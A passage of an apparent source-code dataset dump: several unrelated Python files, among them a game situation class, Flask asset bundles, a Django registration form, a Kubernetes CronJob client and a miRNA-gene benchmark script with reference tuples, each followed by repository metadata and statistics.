INSTANCE_TUNABLES = {'situation_default_job_and_role': TunableSituationJobAndRoleState(description='\n The default job that a visitor will be in during the situation.\n '), 'default_state': _SuntannerSituationState.TunableFactory(description='\n The default state of this situation.\n ', display_name='State', tuning_group=GroupNames.STATE)}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
@classmethod
def default_job(cls):
return cls.situation_default_job_and_role.job
@classmethod
def _states(cls):
return [SituationStateData(1, _SuntannerSituationState, factory=cls.default_state)]
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.situation_default_job_and_role.job, cls.situation_default_job_and_role.role_state)]
def start_situation(self):
super().start_situation()
self._change_state(self.default_state())
| 51.766667 | 389 | 0.792659 | 167 | 1,553 | 7.047904 | 0.401198 | 0.050977 | 0.064571 | 0.074766 | 0.116398 | 0.094308 | 0.069669 | 0.069669 | 0.069669 | 0 | 0 | 0.002987 | 0.137798 | 1,553 | 29 | 390 | 53.551724 | 0.876027 | 0 | 0 | 0.130435 | 0 | 0 | 0.1481 | 0.019317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0.043478 | 0.217391 | 0.130435 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
8a6421e5b529d91386be0794928d1cf7f31ecb6a | 1,186 | py | Python | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | octopus/assets.py | quaintm/octopus | 95a732207ee5f43cd0065d8ea6c643cbf3df2d61 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from flask.ext.assets import Bundle, Environment
css = Bundle(
"libs/bootstrap/dist/css/bootstrap.css",
"libs/dataTables/dataTables.bootstrap.css",
"libs/dataTables/dataTables.tableTools.css",
"libs/font-awesome4/css/font-awesome.css",
"libs/bootstrap-datepicker/css/datepicker3.css",
"libs/bootstrap-tagsinput/dist/bootstrap-tagsinput.css",
"css/style.css",
filters="cssmin",
output="public/css/common.css"
)
js = Bundle(
"libs/jQuery/dist/jquery.js",
"libs/bootstrap/dist/js/bootstrap.js",
"libs/dataTables/jquery.dataTables.js",
"libs/dataTables/dataTables.bootstrap.js",
"libs/dataTables/dataTables.tableTools.js",
"libs/bootstrap-datepicker/js/bootstrap-datepicker.js",
"libs/bootstrap-tagsinput/dist/bootstrap-tagsinput.js",
"libs/typeahead.js/dist/typeahead.bundle.js",
"libs/pagedown/Markdown.Converter.js",
"libs/pagedown/Markdown.Sanitizer.js",
"js/plugins.js",
"js/script.js",
# filters='jsmin',
output="public/js/common.js"
)
# Warning: for fonts, you need to copy over everything manually for now to static/fonts
assets = Environment()
assets.register("js_all", js)
assets.register("css_all", css)
| 30.410256 | 87 | 0.736088 | 157 | 1,186 | 5.547771 | 0.33121 | 0.061998 | 0.110218 | 0.059701 | 0.183697 | 0.101033 | 0 | 0 | 0 | 0 | 0 | 0.002801 | 0.096965 | 1,186 | 38 | 88 | 31.210526 | 0.810458 | 0.104553 | 0 | 0 | 0 | 0 | 0.703214 | 0.63138 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a65dcf26657b17b7c976ff8dd2663fc7ac5793d | 473 | py | Python | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | users/forms.py | gurnitha/django-fantom-blog | f9533be63ea71ce21fd9ddb37cf6f16eee905d88 | [
"Unlicense"
] | null | null | null | # users/forms.py
# Django modules
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class RegisterForm(UserCreationForm):
username = forms.CharField(max_length=50)
email = forms.EmailField(max_length=50)
password1 = forms.CharField()
password2 = forms.CharField()
class Meta(UserCreationForm):
model = User
fields = ('username','email','password1','password2') | 29.5625 | 61 | 0.733615 | 54 | 473 | 6.388889 | 0.481481 | 0.086957 | 0.098551 | 0.121739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020202 | 0.162791 | 473 | 16 | 61 | 29.5625 | 0.85101 | 0.061311 | 0 | 0 | 0 | 0 | 0.070136 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.272727 | 0.272727 | 0 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
8a66876f05b1b369b3cf906bf07be210c4813ad8 | 74 | py | Python | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | null | null | null | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | 1 | 2020-10-13T05:00:06.000Z | 2020-10-17T00:49:17.000Z | Condicionais/If.py | caiojjj/python_1_USP_coursera | 1ac03cc0d50f505f8a7ef364cb04b90d41235b9b | [
"MIT"
] | null | null | null | i = 2
while True:
if i % 3 == 0:
break
print(i)
i += 2 | 12.333333 | 18 | 0.391892 | 13 | 74 | 2.230769 | 0.692308 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 0.472973 | 74 | 6 | 19 | 12.333333 | 0.641026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a71f15e4983c25be8b8c1fedab40345aa59f02b | 1,274 | py | Python | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 599 | 2019-06-25T03:20:46.000Z | 2022-03-31T12:14:33.000Z | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 537 | 2019-06-27T06:03:44.000Z | 2022-03-31T12:10:01.000Z | bcs-ui/backend/resources/workloads/cronjob/client.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 214 | 2019-06-25T03:26:05.000Z | 2022-03-31T07:52:03.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.container_service.clusters.base.models import CtxCluster
from backend.resources.constants import DEFAULT_CRON_JOB_API_VERSION, K8sResourceKind
from backend.resources.resource import ResourceClient
from backend.resources.workloads.cronjob.formatter import CronJobFormatter
class CronJob(ResourceClient):
kind = K8sResourceKind.CronJob.value
formatter = CronJobFormatter()
def __init__(self, ctx_cluster: CtxCluster):
super().__init__(ctx_cluster=ctx_cluster, api_version=DEFAULT_CRON_JOB_API_VERSION)
| 47.185185 | 115 | 0.803768 | 175 | 1,274 | 5.731429 | 0.645714 | 0.059821 | 0.059821 | 0.031904 | 0.047856 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011797 | 0.135008 | 1,274 | 26 | 116 | 49 | 0.898367 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a75c90846e238637f681187748aa64677cef934 | 232 | py | Python | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | test/assets/vector_collection.py | pydget/xbrief | 9e91927a98754b0fca1fa55eae9a785b15e963f9 | [
"MIT"
] | null | null | null | vector_collection = {
'none': None,
'empty': [],
'numerals': [1, 1, 2, 3, 5, 8, 13, 21],
'strings': ['foo', 'bar', 'zen'],
'cities': ['san fransisco', 'buenos aires', 'bern', 'kinshasa-brazzaville', 'nairobi']
}
| 29 | 90 | 0.530172 | 27 | 232 | 4.518519 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054645 | 0.211207 | 232 | 7 | 91 | 33.142857 | 0.612022 | 0 | 0 | 0 | 0 | 0 | 0.409483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a85f3036c67974130bf8da629d90eecc39be1ee | 32,156 | py | Python | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | python/mirtex_benchmark/summarizeResults.py | mjoppich/miRExplore | 32760d88d65e7bc23b2bfb49415efcd0a7c7c5e1 | [
"Apache-2.0"
] | null | null | null | import os,sys
sys.path.insert(0, "/mnt/f/dev/git/miRExplore/python/")
import time
from textdb.MiGenRelDB import MiGenRelDB
from textdb.SentenceDB import SentenceDB
from collections import defaultdict
from natsort import natsorted
sentDB, _ = SentenceDB.loadFromFile("./test/", "./development/pmid2sent", returnAll=True, redoPmid2Sent=True)
mmuDB = MiGenRelDB.loadFromFile("./aggregated_test/mirna_gene.mmu.pmid", ltype="mirna", rtype="gene")
hsaDB = MiGenRelDB.loadFromFile("./aggregated_test/mirna_gene.hsa.pmid", ltype="mirna", rtype="gene")
referenceSolution = [
('16831872','miR-9','ONECUT2','MIR_GENE'),
('16831872','miR-9','SYTL4','MIR_GENE'),
#('17438130','miR-17-92','MYC','GENE_MIR'), # not a miRNA (miR-17-92 cluster)
('17438130','let-7c','MYC','MIR_GENE'),
('17438130','let-7c','MIR17HG','MIR_GENE'), #The PPARalpha-mediated induction of c-myc via let-7C subsequently increased expression of the oncogenic mir-17-92 cluster; these events did not occur in Pparalpha-null mice.
('18185580','miR-335','SOX4','MIR_GENE'),
('18185580','miR-335','TNC','MIR_GENE'),
('18755897','miR-34','TP53','GENE_MIR'), # wrong: acetylated TP53 // correct: Finally, miR-34a itself is a transcriptional target of p53, suggesting a positive feedback loop between p53 and miR-34a.
('18755897','miR-34a','TP53','GENE_MIR'),
('18755897','miR-34a','SIRT1','MIR_GENE'),
('18755897','miR-34','SIRT1','MIR_GENE'),
('18755897','miR-34','TP53','MIR_GENE'), # wrong: acetylated TP53 // correct: Finally, miR-34a itself is a transcriptional target of p53, suggesting a positive feedback loop between p53 and miR-34a.
('18755897','miR-34','CDKN1A','MIR_GENE'), #p21 #miR-34a
('18755897','miR-34','TPT1','MIR_GENE'), # p21
('18755897','miR-34','NSG1','MIR_GENE'), # p21
('18755897','miR-34','H3F3AP6','MIR_GENE'), # p21
('18755897','miR-34','TCEAL1','MIR_GENE'), # p21
('18755897','miR-34','BBC3','MIR_GENE'), #34a, has syn PUMA
('19059913','miR-223','SPI1','GENE_MIR'),
('19059913','miR-223','NFIA','MIR_GENE'),
('19059913','miR-223','NFIC','MIR_GENE'), # TM error, means NFIA
('19059913','miR-223','CSF1R','MIR_GENE'),
('19073597','miR-133a','MYOD1','GENE_MIR'),
('19073597','miR-133a','UCP2','MIR_GENE'),
('19073597','miR-133a','BMIQ4','MIR_GENE'), # has UCP-2 as syn
('19073597','miR-133a-mediated','UCP2','MIR_GENE'),
('19073597','miR-133a-mediated','BMIQ4','MIR_GENE'), # has UCP-2 as syn
('22066022', 'miR-21', 'GPT', 'MIR_GENE'), # missing mirtex: Serum miR-21 levels correlated with histological activity index (HAI) in the liver, alanine aminotransferase (ALT), aspartate aminotransferase , bilirubin, international normalized ratio and gamma-glutamyltransferase.
('19158092','miR-21','PDCD4','MIR_GENE'),
('19158092','miR-21-mediated','PDCD4','MIR_GENE'),
#('19378336','miR-145','KRT7','MIR_GENE'), #no interaction
('19378336','miR-30','KRT7','MIR_GENE'),
('19378336','miR-133a','KRT7','MIR_GENE'),
#('19378336','miR-133b','KRT7','MIR_GENE'), #no interaction in text
#('19378336','miR-195','KRT7','MIR_GENE'), #no interaction
#('19378336','miR-125b','KRT7','MIR_GENE'), #no interaction in text
('19378336','miR-199a','KRT7','MIR_GENE'),
('19524507','miR-31','RHOA','MIR_GENE'),
('19544458','miR-92b','CORO1A','MIR_GENE'), # was p57
('19625769','miR-101','EZH2','MIR_GENE'),
('19723773','miR-290','CDKN2A','MIR_GENE'), # p16
('19839716','miR-205','ERBB3','MIR_GENE'),
('19839716','miR-205','ZEB1','MIR_GENE'),
('19956414','miR-29b','COL1A1','MIR_GENE'),
('19956414','miR-29b','OI4','MIR_GENE'), #COL1A1
('19956414','miR-29b','COL1A2','MIR_GENE'),
('19956414','miR-29b','COL4A1','MIR_GENE'),
('19956414','miR-29b','COL5A1','MIR_GENE'),
('19956414','miR-29b','COL5A2','MIR_GENE'),
('19956414','miR-29b','COL3A1','MIR_GENE'),
('19956414','miR-29b','EDS4A','MIR_GENE'), #COL3A1
('19956414','miR-29b','LAMC1','MIR_GENE'),
('19956414','miR-29b','FBN1','MIR_GENE'),
('19956414','miR-29b','SPARC','MIR_GENE'),
('19956414','miR-29b','ON','MIR_GENE'), #osteonectin
('19956414','miR-29b','BMP1','MIR_GENE'),
('19956414','miR-29b','PCOLC','MIR_GENE'), #BMP1
('19956414','miR-29b','ADAM12','MIR_GENE'),
('19956414','miR-29b','NKIRAS2','MIR_GENE'),
('20012062','miR-221','PSMD9','MIR_GENE'), #p27
('20012062','miR-222','PSMD9','MIR_GENE'),
('20012062','miR-221','SSSCA1','MIR_GENE'), #p27
('20012062','miR-222','SSSCA1','MIR_GENE'),
('20017139','miR-146a','CNTN2','GENE_MIR'),
('20017139','miR-146a','NFKB1','GENE_MIR'),
#('20046097', 'miR-449', 'CDK', 'MIR_GENE'), # CDK not a gene symbol, not in mirtex
('20046097', 'miR-449', 'E2F1', 'MIR_GENE'), #not in mirtex :miR-449 regulates CDK-Rb-E2F1 through an auto-regulatory feedback circuit.
('20046097', 'miR-449', 'RB1', 'MIR_GENE'), #not in mirtex
('20103675','miR-222','PPP2R2A','MIR_GENE'),
('20143188','miR-21','PDCD4','MIR_GENE'),
('20299489','miR-34a','ERK','GENE_MIR'),
('20299489','miR-34a','EPHB2','GENE_MIR'),# ERK syn
('20299489','miR-34a','MAPK1','GENE_MIR'),# ERK syn
('20299489','miR-34a','MAP2K1','MIR_GENE'),
('20299489','miR-221','FOS','MIR_GENE'),
('20299489','miR-222','FOS','MIR_GENE'),
('20299489','miR-34a','FOSB','GENE_MIR'), #mirtex missing: induced miR-34a expression by transactivation via the activator protein-1 binding site in the upstream region of the miR-34a gene.
('20299489','miR-34a','JUND','GENE_MIR'), # activator protein 1 syn
('20299489','miR-34a','JUN','GENE_MIR'), # induced miR-34a expression by transactivation via the activator protein-1 binding site
('20462046','miR-21','PDCD4','MIR_GENE'),
('20478254','miR-183','SLC1A1','MIR_GENE'),
('20478254','miR-96','SLC1A1','MIR_GENE'),
('20478254','miR-182','SLC1A1','MIR_GENE'),
('20498046','miR-200b','ATP2A2','MIR_GENE'),
('20498046','miR-214','ATP2A2','MIR_GENE'),
('20603081','miR-150','MYB','MIR_GENE'),
('20606648', 'miR-34a', 'BIRC5', 'MIR_GENE'), # missing in mirtex, miRNA-34a (miR-34a) induced apoptosis, inhibited survivin expression, and downregulated MAPK pathway in B16F10 cells.
('20620960','miR-200c','FAP','MIR_GENE'),
('20620960','miR-200','FAP','MIR_GENE'),
('20620960','miR-200c','GLMN','MIR_GENE'), # has FAP as syn
('20620960','miR-200','GLMN','MIR_GENE'), # has FAP as syn
('20620960','miR-200','FAS','MIR_GENE'), # CD95; quite indirect though. miR-200c regulates induction of apoptosis through CD95 by targeting FAP-1.
('20620960','miR-200c','FAS','MIR_GENE'), # CD95; quite indirect though. miR-200c regulates induction of apoptosis through CD95 by targeting FAP-1.
('20620960','miR-200','ZEB1','MIR_GENE'), # 200c
('20620960','miR-200','ZEB2','MIR_GENE'), # 200c
('20620960','miR-200','PPCD3','MIR_GENE'), # ZEB1
('20676061','miR-29c','WNT5A','MIR_GENE'),
('20676061','miR-130b','WNT5A','MIR_GENE'),
('20676061','miR-101','WNT5A','MIR_GENE'),
('20676061','miR-30b','WNT5A','MIR_GENE'),
('20676061','miR-140','WNT5A','MIR_GENE'),
('20676061','miR-29c','ZIC1','MIR_GENE'),
('20676061','miR-130b','ZIC1','MIR_GENE'),
('20676061','miR-101','ZIC1','MIR_GENE'),
('20676061','miR-30b','ZIC1','MIR_GENE'),
('20676061','miR-140','ZIC1','MIR_GENE'),
('20676061','miR-29c','TGFB1','MIR_GENE'),
('20676061','miR-130b','TGFB1','MIR_GENE'),
('20676061','miR-101','TGFB1','MIR_GENE'),
('20676061','miR-30b','TGFB1','MIR_GENE'),
('20676061','miR-140','TGFB1','MIR_GENE'),
('20676061','miR-29c','DPD1','MIR_GENE'), # has TGFB1 as syn
('20676061','miR-130b','DPD1','MIR_GENE'),
('20676061','miR-101','DPD1','MIR_GENE'),
('20676061','miR-30b','DPD1','MIR_GENE'),
('20676061','miR-140','DPD1','MIR_GENE'),
('20736365','miR-196','HOXC8','MIR_GENE'),
('20736365','miR-196','HOX3A','MIR_GENE'), # has syn HOXC8
('20859756', 'miR-126', 'TMEM8B', 'GENE_MIR'), # missing mirtex: In particular, miR-126, miR-142-3p, miR-155, miR-552, and miR-630 were all upregulated, whereas miR-146a, miR-152, miR-205, miR-365, miR-449, miR-518c, miR-584, miR-615, and miR-622 were downregulated after NGX6 transfection.
('20859756', 'miR-142', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-155', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-552', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-630', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-146a', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-152', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-205', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-365', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-449', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-518c', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-584', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-615', 'TMEM8B', 'GENE_MIR'),
('20859756', 'miR-622', 'TMEM8B', 'GENE_MIR'),
('20945501', 'miR-141', 'AR', 'MIR_GENE'), # missing mirtex, inhibition of miR-141 by anti-miR-141 suppressed the growth of the LNCaP subline overexpressing AR.
('20945501', 'miR-141', 'SBMA', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'DHTR', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B3', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B7', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AKR1B8', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'SBMA', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'AREG', 'MIR_GENE'), # has AR as syn
('20945501', 'miR-141', 'FDXR', 'MIR_GENE'), # has AR as syn
('20947507','miR-155','NFKB1','GENE_MIR'),
('20947507','miR-155','CARD11','GENE_MIR'),
('20947507','miR-155','SPI1','MIR_GENE'), # PU.1
#('20947507','miR-155','CD10','MIR_GENE'),
('20947507','miR-155','MME','MIR_GENE'), # CD10
('21088996','miR-21','PDCD4','MIR_GENE'),
('21276775','miR-145','ROBO2','MIR_GENE'),
('21276775','miR-145','SRGAP2','MIR_GENE'),
('21276775','miR-145','SRGAP3','MIR_GENE'), # has SRGAP2 syn
('21276775','miR-214','ROBO2','MIR_GENE'),
('21276775','miR-214','SRGAP2','MIR_GENE'),
('21276775','miR-214','SRGAP3','MIR_GENE'),# has SRGAP2 syn
('21285947','miR-24','INS','MIR_GENE'),
('21285947','miR-26','INS','MIR_GENE'),
('21285947','miR-182','INS','MIR_GENE'),
('21285947','miR-148','INS','MIR_GENE'),
#('21347332','miR-21','serum','GENE_MIR'), # not a gene
('21347332','miR-21','FGF2','GENE_MIR'),
('21347332','miR-21','RHOB','MIR_GENE'),
('21415212','miR-486','OLFM4','MIR_GENE'),
('21454627','mmu-miR-183','mSEL-1L','MIR_GENE'),
('21609717','miR-98-mediated','IL10','MIR_GENE'),
('21609717','miR-98','IL10','MIR_GENE'),
('21609717','miR-98','PTGS2','MIR_GENE'), #COX-2
('21609717','miR-98', 'LPS', 'GENE_MIR'),
('21609717','miR-98', 'IRF6', 'GENE_MIR'), #missing mirtex, MicroRNA-98 negatively regulates IL-10 production and endotoxin tolerance in macrophages after LPS stimulation.
('21666774','miR-21','LH (luteinizing hormone)','GENE_MIR'),
('21666774','miR-132','LH (luteinizing hormone)','GENE_MIR'),
('21666774','miR-212','LH (luteinizing hormone)','GENE_MIR'),
('21685392','miR-143','NOTCH1','MIR_GENE'), #should be N1ICD, TM issue
('21685392','miR-145','NOTCH1','MIR_GENE'),
('21685392','miR-143','TAN1','MIR_GENE'), #should be N1ICD, TM issue
('21685392','miR-145','TAN1','MIR_GENE'),
('21685392','miR-143','RBPJ','GENE_MIR'), #We also identified N1ICD complex binding to CBF1 sites within the endogenous human miR-143/145 promoter.
('21685392','miR-145','RBPJ','GENE_MIR'),
('21685392','miR-143','JAG1','GENE_MIR'), #Using SRF knockdown, we found that Jag-1/Notch induction of miR-143/145 is SRF independent, although full acquisition of contractile markers requires SRF.
('21685392','miR-145','JAG1','GENE_MIR'),
('21685392','miR-143','SRF','GENE_MIR'), #Using SRF knockdown, we found that Jag-1/Notch induction of miR-143/145 is SRF independent, although full acquisition of contractile markers requires SRF.
('21685392','miR-145','SRF','GENE_MIR'),
('21685392','miR-145','MYOCD','GENE_MIR'), #The serum response factor (SRF)/myocardin complex binds to CArG sequences to activate miR-143/145 transcription
('21685392','miR-143','MYOCD','GENE_MIR'),
('21693621','miR-21','MYC','GENE_MIR'),
('21693621','miR-29a','MYC','GENE_MIR'),
('21898400','miR-520c','MTOR','MIR_GENE'),
('21898400','miR-373','MTOR','MIR_GENE'),
('21898400','miR-520c','SIRT1','MIR_GENE'),
('21898400','miR-373','SIRT1','MIR_GENE'),
('21898400','miR-520c','MMP9','MIR_GENE'),
('21898400','miR-373','MMP9','MIR_GENE'),
('21898400','miR-520c','CLG4B','MIR_GENE'), # MMP-9
('21898400','miR-373','CLG4B','MIR_GENE'),
('22123611','miR-195','BCL2','MIR_GENE'),
('22123611','miR-195','CASP3','MIR_GENE'),
('22123611','miR-195','WT1','MIR_GENE'), #missing mirtex: miR-195-treated podocytes underwent actin rearrangement and failed to synthesize sufficient levels of WT-1 and synaptopodin proteins, which suggests that the cells had suffered injuries similar to those observed in diabetic nephropathy in both humans and animal models.
('22123611','miR-195','SYNPO','MIR_GENE'),
('22123611','miR-195','GUD','MIR_GENE'),
('22139444','miR-30c','MTA1','MIR_GENE'),
('22249219','miR-214','ADORA2A','MIR_GENE'),
('22249219','miR-15','ADORA2A','MIR_GENE'),
('22249219','miR-16','ADORA2A','MIR_GENE'),
('22269326','miR-29b','COL1A1','MIR_GENE'),
('22269326','miR-29b','COL3A1','MIR_GENE'),
('22269326','miR-29b','EDS4A','MIR_GENE'), #COL3A1 syn
('22269326','miR-29b','COL5A1','MIR_GENE'),
('22269326','miR-29b','ELN','MIR_GENE'),
('22286762','miR-21','NF-kappaB','GENE_MIR'),
('22286762','miR-10b','NF-kappaB','GENE_MIR'),
('22286762','miR-17','NF-kappaB','GENE_MIR'),
('22286762','miR-9','NF-kappaB','GENE_MIR'),
('22569260','miR-223','FOXO1','MIR_GENE'),
('22569260','miR-223','FKHR','MIR_GENE'), # FOXO1 syn
('22634495','miR-10a','CHL1','MIR_GENE'),
('22634495','miR-10a','DDX11','MIR_GENE'), # CHL1 syn
('22698995','let-7','BACH1','MIR_GENE'),
('22698995','let-7b','BACH1','MIR_GENE'),
('22698995','let-7c','BACH1','MIR_GENE'),
('22698995','miR-98','BACH1','MIR_GENE'),
#same gene symbol
('22698995','let-7','BRIP1','MIR_GENE'),
('22698995','let-7b','BRIP1','MIR_GENE'),
('22698995','let-7c','BRIP1','MIR_GENE'),
('22698995','miR-98','BRIP1','MIR_GENE'),
('22698995','let-7','HMOX1','MIR_GENE'),
('22761336','miR-96','REV1','MIR_GENE'),
('22761336','miR-96','RAD51','MIR_GENE'),
('22761336','miR-96','RECA','MIR_GENE'), #RAD51
('22761336','miR-96','RAD51A','MIR_GENE'),
('22847613','miR-130b','TP53','GENE_MIR'),
('22847613','miR-130b','ZEB1','MIR_GENE'),
('22847613','miR-130b','PPCD3','MIR_GENE'), # zeb1
('22891274','miR-146a','NFKB1','GENE_MIR'),
('22891274','miR-146a','NFKB1','MIR_GENE'),
('22891274','miR-146a','TRAF6','MIR_GENE'),
('22891274','miR-146a','IRAK1','MIR_GENE'),
('22925189','miR-30c','ERBB2','MIR_GENE'), #Her-2
('22925189','miR-30d','ERBB2','MIR_GENE'),
('22925189','miR-30e','ERBB2','MIR_GENE'),
('22925189','miR-532','ERBB2','MIR_GENE'),
('22955854','miR-144','ZFX','MIR_GENE'),
('22956424','miR-21','PTEN','MIR_GENE'),
('22956424','miR-21','MHAM','MIR_GENE'), # has PTEN syn
('22956424','miR-21','BZS','MIR_GENE'), # has PTEN syn
('22982443','miR-200c','BMI1','MIR_GENE'),
('22982443','miR-200c','ABCG2','MIR_GENE'),
('22982443','miR-200c','ABCG5','MIR_GENE'),
('22982443','miR-200c','MDR1','MIR_GENE'),
('22982443','miR-200c','TBC1D9','MIR_GENE'), # has syn MDR1
('22982443','miR-200c','ABCB1','MIR_GENE'), # has syn MDR1
('22982443','miR-200c','CDH1','MIR_GENE'),
('23010597','miR-134','FOXM1','MIR_GENE'),
('23010597','miR-134','FKHL16','MIR_GENE'), # has FOXM1 as syn
('23010597','miR-134','ITK','MIR_GENE'), # has EMT as syn; mirtex missing: Functional assays demonstrated that miR-134 inhibited EMT in NSCLC cells.
('23010597','miR-134','SLC22A3','MIR_GENE'), # has EMT as syn
('23041385','miR-21','CRP','MIR_GENE'),
#('23041385','miR-21','fibrinogen','MIR_GENE'), # not a gene
('23041385','miR-21','TGFB2','MIR_GENE'),
('23097316','miR-34c','RARg','MIR_GENE'),
('23113351','miR-29','TP53','MIR_GENE'), # missing in mirtex: While miRNA-29 members induced apoptosis through p53 gene activation, the effect of miRNA-29a on osteoblastic cells was independent on p53 expression level.
('23113351','miR-29a','TP53','MIR_GENE'),
('23113351','miR-29','BCL2','MIR_GENE'),
('23113351','miR-29','MCL1','MIR_GENE'),
('23113351','miR-29','CLEC4D','MIR_GENE'), # CLEC4D has syn mcl
('23113351','miR-29a','CLEC4D','MIR_GENE'), # CLEC4D has syn mcl
#('23113351','miR-29','E2F1','MIR_GENE'),
#('23113351','miR-29','E2F3','MIR_GENE'),
('23113351','miR-29a','BCL2','MIR_GENE'),
('23113351','miR-29a','MCL1','MIR_GENE'),
('23113351','miR-29a','E2F1','MIR_GENE'),
